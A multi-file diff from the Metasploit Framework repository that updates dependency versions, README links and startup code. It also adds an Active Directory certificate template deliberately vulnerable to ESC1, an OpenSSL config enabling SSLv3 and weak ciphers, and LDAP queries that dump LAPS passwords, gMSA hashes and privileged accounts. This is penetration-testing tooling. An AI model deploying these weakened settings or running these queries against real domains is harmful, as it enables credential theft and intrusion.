 gssapi, 1.3.1, MIT
@@ -57,135 +65,147 @@ hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
 http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.10.0, MIT
-io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.3.6, "ruby, Simplified BSD"
-jmespath, 1.6.1, "Apache 2.0"
+i18n, 1.14.1, MIT
+io-console, 0.6.0, "ruby, Simplified BSD"
+irb, 1.7.4, "ruby, Simplified BSD"
+jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.2, ruby
+json, 2.6.3, ruby
+language_server-protocol, 3.17.0.3, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.18.0, MIT
-memory_profiler, 1.0.0, MIT
+loofah, 2.21.3, MIT
+macaddr, 1.7.2, ruby
+memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.9, "New BSD"
-metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
+metasploit-concern, 5.0.2, "New BSD"
+metasploit-credential, 6.0.6, "New BSD"
+metasploit-framework, 6.3.39, "New BSD"
+metasploit-model, 5.0.2, "New BSD"
+metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.3, "New BSD"
+metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mini_portile2, 2.8.0, MIT
-minitest, 5.15.0, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.5.2, "Apache 2.0"
+mime-types, 3.5.1, MIT
+mime-types-data, 3.2023.1003, MIT
+mini_portile2, 2.8.4, MIT
+minitest, 5.20.0, MIT
+mqtt, 0.6.0, MIT
+msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
-mustermann, 1.1.1, MIT
+mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.1, MIT
-net-protocol, 0.1.3, "ruby, Simplified BSD"
-net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 6.1.0, MIT
-network_interface, 0.0.2, MIT
+net-imap, 0.4.0, "ruby, Simplified BSD"
+net-ldap, 0.18.0, MIT
+net-protocol, 0.2.1, "ruby, Simplified BSD"
+net-smtp, 0.4.0, "ruby, Simplified BSD"
+net-ssh, 7.2.0, MIT
+network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
-nio4r, 2.5.8, MIT
-nokogiri, 1.13.6, MIT
+nio4r, 2.5.9, MIT
+nokogiri, 1.14.5, MIT
 nori, 2.6.0, MIT
-octokit, 4.24.0, MIT
-openssl-ccm, 1.2.2, MIT
-openssl-cmac, 2.0.1, MIT
+octokit, 4.25.1, MIT
+openssl-ccm, 1.2.3, MIT
+openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
-packetfu, 1.1.13, BSD
-parallel, 1.22.1, MIT
-parser, 3.1.2.0, MIT
+packetfu, 2.0.0, "New BSD"
+parallel, 1.23.0, MIT
+parser, 3.2.2.4, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
-pdf-reader, 2.10.0, MIT
-pg, 1.3.5, "Simplified BSD"
-pry, 0.13.1, MIT
-pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.7, MIT
-puma, 5.6.4, "New BSD"
-racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3.1, MIT
-rack-protection, 2.2.0, MIT
-rack-test, 1.1.0, MIT
-rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.3, MIT
-railties, 6.1.6, MIT
+pdf-reader, 2.11.0, MIT
+pg, 1.5.4, "Simplified BSD"
+pry, 0.14.2, MIT
+pry-byebug, 3.10.1, MIT
+public_suffix, 5.0.3, MIT
+puma, 6.4.0, "New BSD"
+racc, 1.7.1, "ruby, Simplified BSD"
+rack, 2.2.8, MIT
+rack-protection, 3.1.0, MIT
+rack-test, 2.1.0, MIT
+rails-dom-testing, 2.2.0, MIT
+rails-html-sanitizer, 1.6.0, MIT
+railties, 7.0.8, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
+rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.23, unknown
-redcarpet, 3.5.1, MIT
-regexp_parser, 2.5.0, MIT
-reline, 0.2.5, ruby
-rex-arch, 0.1.14, "New BSD"
-rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.28, "New BSD"
-rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.33, "New BSD"
-rex-java, 0.1.6, "New BSD"
-rex-mime, 0.1.7, "New BSD"
-rex-nop, 0.1.2, "New BSD"
-rex-ole, 0.1.7, "New BSD"
-rex-powershell, 0.1.96, "New BSD"
-rex-random_identifier, 0.1.8, "New BSD"
-rex-registry, 0.1.4, "New BSD"
-rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.39, "New BSD"
-rex-sslscan, 0.1.7, "New BSD"
-rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.38, "New BSD"
-rex-zip, 0.1.4, "New BSD"
-rexml, 3.2.5, "Simplified BSD"
+recog, 3.1.2, unknown
+redcarpet, 3.6.0, MIT
+regexp_parser, 2.8.1, MIT
+reline, 0.3.8, ruby
+require_all, 3.0.0, MIT
+rex-arch, 0.1.15, "New BSD"
+rex-bin_tools, 0.1.9, "New BSD"
+rex-core, 0.1.31, "New BSD"
+rex-encoder, 0.1.7, "New BSD"
+rex-exploitation, 0.1.39, "New BSD"
+rex-java, 0.1.7, "New BSD"
+rex-mime, 0.1.8, "New BSD"
+rex-nop, 0.1.3, "New BSD"
+rex-ole, 0.1.8, "New BSD"
+rex-powershell, 0.1.99, "New BSD"
+rex-random_identifier, 0.1.11, "New BSD"
+rex-registry, 0.1.5, "New BSD"
+rex-rop_builder, 0.1.5, "New BSD"
+rex-socket, 0.1.54, "New BSD"
+rex-sslscan, 0.1.10, "New BSD"
+rex-struct2, 0.1.4, "New BSD"
+rex-text, 0.2.53, "New BSD"
+rex-zip, 0.1.5, "New BSD"
+rexml, 3.2.6, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.11.0, MIT
-rspec-core, 3.11.0, MIT
-rspec-expectations, 3.11.0, MIT
-rspec-mocks, 3.11.1, MIT
-rspec-rails, 5.1.2, MIT
+rspec, 3.12.0, MIT
+rspec-core, 3.12.2, MIT
+rspec-expectations, 3.12.3, MIT
+rspec-mocks, 3.12.6, MIT
+rspec-rails, 6.0.3, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.11.0, MIT
-rubocop, 1.30.1, MIT
-rubocop-ast, 1.18.0, MIT
-ruby-macho, 3.0.0, MIT
+rspec-support, 3.12.1, MIT
+rubocop, 1.56.4, MIT
+rubocop-ast, 1.29.0, MIT
+ruby-macho, 4.0.0, MIT
+ruby-mysql, 4.1.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
+ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.1.6, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 2.2.0, MIT
-sqlite3, 1.4.2, "New BSD"
-sshkey, 2.0.0, MIT
+sinatra, 3.1.0, MIT
+sqlite3, 1.6.6, "New BSD"
+sshkey, 3.0.0, MIT
+strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
-thin, 1.8.1, "GPL-2.0+, ruby"
-thor, 1.2.1, MIT
-tilt, 2.0.10, MIT
-timecop, 0.9.5, MIT
-timeout, 0.3.0, "ruby, Simplified BSD"
+systemu, 2.6.5, ruby
+test-prof, 1.2.3, MIT
+thin, 1.8.2, "GPL-2.0+, ruby"
+thor, 1.2.2, MIT
+tilt, 2.3.0, MIT
+timecop, 0.9.8, MIT
+timeout, 0.4.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.4, MIT
-tzinfo-data, 1.2022.1, MIT
+tzinfo, 2.0.6, MIT
+tzinfo-data, 1.2023.3, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.1.0, MIT
-unix-crypt, 1.3.0, BSD
+unicode-display_width, 2.5.0, MIT
+unix-crypt, 1.3.1, 0BSD
+uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.7.0, "ruby, Simplified BSD"
-websocket-driver, 0.7.5, "Apache 2.0"
+webrick, 1.8.1, "ruby, Simplified BSD"
+websocket-driver, 0.7.6, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
-windows_error, 0.1.4, BSD
+windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
-xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.28, MIT
-zeitwerk, 2.5.4, MIT
+xmlrpc, 0.3.3, "ruby, Simplified BSD"
+yard, 0.9.34, MIT
+zeitwerk, 2.6.12, MIT
@@ -1,27 +1,33 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.

-The latest version of this software is available from: https://metasploit.com
+The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

-Bug tracking and development information can be found at:
- https://github.com/rapid7/metasploit-framework
+You can find documentation on Metasploit and how to use it at:
+ https://docs.metasploit.com/
+
+Information about setting up a development environment can be found at:
+ https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
+
+Our bug and feature request tracker can be found at:
+ https://github.com/rapid7/metasploit-framework/issues

 New bugs and feature requests should be directed to:
  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
-  https://rapid7.github.io/metasploit-framework/api
+  https://docs.metasploit.com/api/

 Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
+Generally, you should use [the free installer](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -29,21 +35,20 @@ Using Metasploit
 Metasploit can do all sorts of things. The first thing you'll want to do
 is start `msfconsole`, but after that, you'll probably be best served by
 reading [Metasploit Unleashed][unleashed], the [great community
-resources](https://metasploit.github.io), or the [wiki].
+resources](https://metasploit.github.io), or take a look at the
+[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html)
+page on the documentation website.

 Contributing
 --
-See the [Dev Environment Setup][wiki-devenv] guide on GitHub, which will
+See the [Dev Environment Setup][devenv] guide on GitHub, which will
 walk you through the whole process from installing all the
 dependencies, to cloning the repository, and finally to submitting a
 pull request. For slightly more information, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).


-[wiki]: https://github.com/rapid7/metasploit-framework/wiki
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
-[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
-[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[devenv]: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html "Metasploit Development Environment Setup"
 [unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -0,0 +1 @@
+This directory contains ActiveRecord concerns, models and validators.
@@ -0,0 +1,3 @@
+Contains various files that help configure Metasploit. Most files here you'll never have to deal with, though
+`database.yml.example` might be useful for those looking to configure their database, and `openssl.conf`
+might be helpful for those trying to troubleshoot OpenSSL issues in Metasploit.
@@ -1,3 +1,6 @@
+require 'fiddle'
+Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
+
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -44,7 +47,11 @@ module Metasploit
      when "test"
        config.eager_load = false
      when "production"
-        config.eager_load = true
+        config.eager_load = false
+      end
+
+      if ActiveRecord.respond_to?(:legacy_connection_handling=)
+        ActiveRecord.legacy_connection_handling = false
      end
    end
  end
@@ -38,3 +38,64 @@ lib_path = root.join('lib').to_path
 unless $LOAD_PATH.include? lib_path
  $LOAD_PATH.unshift lib_path
 end
+
+require 'digest'
+require 'metasploit/framework/version'
+require 'msf/base/config'
+
+# Invalidate and delete the bootsnap cache if required. For instance if the metasploit-framework version has changed.
+#
+# @param [Hash] bootsnap_config See https://github.com/Shopify/bootsnap/blob/95e8d170aea99a831fd484ce09ad2f195644e740/lib/bootsnap.rb#L38
+# @return [void]
+def invalidate_bootsnap_cache!(bootsnap_config)
+  expected_cache_metadata = {
+    'metasploit_framework_version' => Metasploit::Framework::Version::VERSION,
+    'ruby_description' => RUBY_DESCRIPTION,
+    'bundler_lockfile_hash' => Digest::MD5.hexdigest(Bundler.read_file(Bundler.default_lockfile)),
+    'bootsnap_config' => {
+      'load_path_cache' => bootsnap_config[:load_path_cache],
+      'compile_cache_iseq' => bootsnap_config[:compile_cache_iseq],
+      'compile_cache_yaml' => bootsnap_config[:compile_cache_yaml],
+    }
+  }
+
+  cache_metadata_path = File.join(bootsnap_config[:cache_dir], "metadata.yaml")
+  if File.exist?(cache_metadata_path)
+    cache_metadata = YAML.safe_load(File.binread(cache_metadata_path))
+    if cache_metadata != expected_cache_metadata
+      FileUtils.rm_rf(bootsnap_config[:cache_dir], secure: true)
+    end
+  end
+
+  FileUtils.mkdir_p(bootsnap_config[:cache_dir])
+  File.binwrite(cache_metadata_path, expected_cache_metadata.to_yaml)
+
+  nil
+end
+
+# Attempt to use bootsnap caching for improved startup time
+begin
+  require 'bootsnap'
+  env = ENV['RAILS_ENV'] || ENV['RACK_ENV'] || ENV['ENV']
+  development_mode = ['', nil, 'development'].include?(env)
+
+  cache_dir = ::File.join(Msf::Config.config_directory, "bootsnap_cache")
+  bootsnap_config = {
+    cache_dir: cache_dir,
+    ignore_directories: [],
+    development_mode: development_mode,
+    load_path_cache: true, # Optimize the LOAD_PATH with a cache
+    compile_cache_iseq: false, # Don't compile Ruby code into ISeq cache, breaks coverage reporting.
+    compile_cache_yaml: false, # Don't compile YAML into a cache
+    readonly: false, # Update caches - https://github.com/Shopify/bootsnap/commit/b51397f96c33aa421fd5c29484fb9574df9eb451
+  }
+  invalidate_bootsnap_cache!(bootsnap_config)
+  Bootsnap.setup(**bootsnap_config)
+rescue => e
+  $stderr.puts "Warning: Failed bootsnap cache setup - #{e.class} #{e} #{e.backtrace}"
+  begin
+    FileUtils.rm_rf(cache_dir, secure: true)
+  rescue
+    $stderr.puts 'Warning: Failed deleting bootsnap cache'
+  end
+end
@@ -0,0 +1,23 @@
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+ssl_conf = ssl_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
+
+[ssl_sect]
+system_default = system_default_sect
+
+[system_default_sect]
+MinProtocol = SSLv3
+CipherString = ALL:@SECLEVEL=0
+Options = UnsafeLegacyRenegotiation
@@ -0,0 +1,15 @@
+---
+info:
+  title: Metasploit Framework
+  description: Metasploit Framework
+  x-cortex-git:
+    github:
+      alias: r7org
+      repository: rapid7/metasploit-framework
+  x-cortex-tag: metasploit-framework
+  x-cortex-type: service
+  x-cortex-domain-parents:
+  - tag: metasploit
+openapi: 3.0.1
+servers:
+- url: "/"
@@ -0,0 +1,7 @@
+This folder contains various data files used for a variety of purposes, including but not limited to banners for the
+console, exploit source code for exploits (under `data/exploits`), template code and binaries, wordlists and shellcode.
+
+As a general rule of thumb this folder will most often be used when you are using compiled binaries or source code from
+other exploits for cases such as local privilege escalation exploits and need to provide the exploit code and compiled
+binaries so that maintainers can verify the binary and compile it themselves, as so that modules can find the R7 compiled
+version of the resulting binary for use during exploitation.
@@ -0,0 +1,27 @@
+---
+# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
+# the request). Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
@@ -1,43 +1,160 @@
 ---
 queries:
-  - action: ENUM_ALL_OBJECT_CLASS
-    description: 'Dump all objects containing any objectClass field.'
-    filter: '(objectClass=*)'
+  - action: ENUM_ACCOUNTS
+    description: 'Dump info about all known user accounts in the domain.'
+    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368)(objectcategory=user)(objectClass=user))'
    attributes:
      - dn
-      - objectClass
+      - name
+      - description
+      - displayName
+      - sAMAccountName
+      - objectSID
+      - userPrincipalName
+      - userAccountControl
+      - homeDirectory
+      - homeDrive
+      - profilePath
+      - memberof
+      - lastLogoff
+      - lastLogon
+      - lastLogonDate
+      - logonCount
+      - badPwdCount
+      - pwdLastSet
+      - SmartcardLogonRequired
+      - LastBadPasswordAttempt
+      - PasswordLastSet
+      - PaswordNeverExpires
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_AD_CS_CAS
+    description: 'Enumerate AD Certificate Service certificate authorities.'
+    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pKIEnrollmentService)'
+    attributes:
+      - cn
+      - name
+      - cACertificateDN
+      - dNSHostname
+      - certificateTemplates
+      - objectGUID
+      - caCertificate
+    references:
+      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
+  - action: ENUM_AD_CS_CERT_TEMPLATES
+    description: 'Enumerate AD Certificate Service certificate templates.'
+    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
+    filter: '(objectClass=pkicertificatetemplate)'
+    attributes:
+      - cn
+      - name
+      - displayName
+      - msPKI-Cert-Template-OID
+      - msPKI-Template-Schema-Version
+      - msPKI-Enrollment-Flag
+      - msPKI-Certificate-Name-Flag
+      - msPKI-Private-Key-Flag
+      - msPKI-RA-Signature
+      - pKIExtendedKeyUsage
+    references:
+      - https://web.archive.org/web/20220818094600if_/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf
+  - action: ENUM_ADMIN_OBJECTS
+    description: 'Dump info about all objects with protected ACLs (i.e highly privileged objects).'
+    filter: '(adminCount=1)'
+    attributes:
+      - dn
+      - description
+      - distinguishedName
+      - name
+      - samAccountName
+      - objectSID
+      - objectGUID
+      - objectCategory
+      - member
+      - memberof
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
  - action: ENUM_ALL_OBJECT_CATEGORY
    description: 'Dump all objects containing any objectCategory field.'
    filter: '(objectCategory=*)'
    attributes:
      - dn
      - objectCategory
-  - action: ENUM_ACCOUNTS
-    description: 'Dump info about all known user accounts in the domain.'
-    filter: '(|(objectClass=organizationalPerson)(sAMAccountType=805306368))'
+  - action: ENUM_ALL_OBJECT_CLASS
+    description: 'Dump all objects containing any objectClass field.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - objectClass
+  - action: ENUM_COMPUTERS
+    description: 'Dump all objects containing an objectCategory or objectClass of Computer.'
+    filter: '(|(objectCategory=computer)(objectClass=computer))'
    attributes:
      - dn
      - name
+      - description
      - displayName
-      - samAccountName
-      - userPrincipalName
-      - userAccountControl
-      - homeDirectory
-      - homeDrive
-      - profilePath
-  - action: ENUM_COMPUTERS
-    description: 'Dump all objects containing an objectCategory of Computer.'
-    filter: '(objectCategory=Computer)'
-    attributes:
-      - dn
-      - displayName
+      - sAMAccountName
+      - objectSID
      - distinguishedName
      - dNSHostName
-      - description
      - givenName
-      - name
+      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
+      - lastLogonTimestamp
+      - servicePrincipalName
+      - primaryGroupId
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_CONSTRAINED_DELEGATION
+    description: 'Dump info about all known objects that allow contrained delegation.'
+    filter: '(userAccountControl:1.2.840.113556.1.4.803:=16777216)'
+    attributes:
+      - cn
+      - sAMAccountName
+      - objectCategory
+      - msds-allowedtodelegateto
+      - servicePrincipalName
+    references:
+      - https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
+      - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation
+  - action: ENUM_DNS_RECORDS
+    description: 'Dump info about DNS records the server knows about using the dnsNode object class.'
+    filter: '(objectClass=dnsNode)'
+    attributes:
+      - dc
+      - cn
+      - dnsRecord
+      - dnsTombstoned
+      - name
+    references:
+      - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
+      - https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
+  - action: ENUM_DNS_ZONES
+    description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
+    filter: '(objectClass=dnsZone)'
+    base_dn_prefix: 'DC=DomainDnsZones'
+    attributes:
+      - name
+      - distinguishedName
+    references:
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN
+    description: 'Dump info about the Active Directory domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+      - objectSID
+      - name
+      - lockoutduration
+      - lockoutthreshold
+      - minpwdage
+      - maxpwdage
+      - minpwdlength
  - action: ENUM_DOMAIN_CONTROLLERS
    description: 'Dump all known domain controllers.'
    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -49,8 +166,22 @@ queries:
      - description
      - givenName
      - name
+      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_EXCHANGE_RECIPIENTS
+    description: 'Dump info about all known Exchange recipients.'
+    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    attributes:
+      - dn
+      - mailNickname
+      - proxyAddresses
+      - name
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
  - action: ENUM_EXCHANGE_SERVERS
    description: 'Dump info about all known Exchange servers.'
    filter: '(&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))'
@@ -62,37 +193,182 @@ queries:
      - description
      - givenName
      - name
+      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
-  - action: ENUM_EXCHANGE_RECIPIENTS
-    description: 'Dump info about all known Exchange recipients.'
-    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
+  - action: ENUM_GMSA_HASHES
+    description: 'Dump info about GMSAs and their password hashes if available.'
+    filter: '(objectClass=msDS-GroupManagedServiceAccount)'
    attributes:
-      - dn
-      - mailNickname
-      - proxyAddresses
-      - name
+      - cn
+      - displayName
+      - msDS-ManagedPassword
+    references:
+      - https://stealthbits.com/blog/securing-gmsa-passwords/
+      - https://o365blog.com/post/gmsa/
+      - https://adsecurity.org/?p=4367
  - action: ENUM_GROUPS
    description: 'Dump info about all known groups in the LDAP environment.'
-    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))'
+    filter: '(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup)(objectcategory=group))'
    attributes:
-      - dn
-      - name
-      - groupType
-      - memberof
-  - action: ENUM_ORGUNITS
-    description: 'Dump info about all known organizational units in the LDAP environment.'
-    filter: '(objectClass=organizationalUnit)'
-    attributes:
-      - dn
-      - displayName
+      - cn
      - name
      - description
+      - groupType
+      - memberof
+      - member
+      - owner
+      - adminCount
+      - managedBy
+      - groupAttributes
+    references:
+      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
+  - action: ENUM_GROUP_POLICY_OBJECTS
+    description: 'Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.'
+    filter: '(objectClass=groupPolicyContainer)'
+    attributes:
+      - displayName
+      - gPCFileSysPath
+      - objectCategory
+      - objectGUID
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_HOSTNAMES
+    description: 'Dump info about all known hostnames in the LDAP environment.'
+    filter: '(dnsHostName=*)'
+    attributes:
+      - dn
+      - name
+      - dnsHostName
+      - serverName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_LAPS_PASSWORDS
+    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    filter: '(ms-MCS-AdmPwd=*)'
+    attributes:
+      - cn
+      - displayName
+      - ms-MCS-AdmPwd
+    references:
+      - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ldap-ldaps
+  - action: ENUM_LDAP_SERVER_METADATA
+    description: 'Dump metadata about the setup of the domain.'
+    filter: '(objectClass=*)'
+    attributes:
+      - dn
+      - defaultNamingContext
+      - domainFunctionality
+      - forestFunctionality
+      - domainControllerFunctionality
+      - dnsHostName
+    references:
+      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_MACHINE_ACCOUNT_QUOTA
+    description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+    references:
+      - https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
  - action: ENUM_ORGROLES
    description: 'Dump info about all known organization roles in the LDAP environment.'
    filter: '(objectClass=organizationalRole)'
    attributes:
-      - dn
      - displayName
      - name
      - description
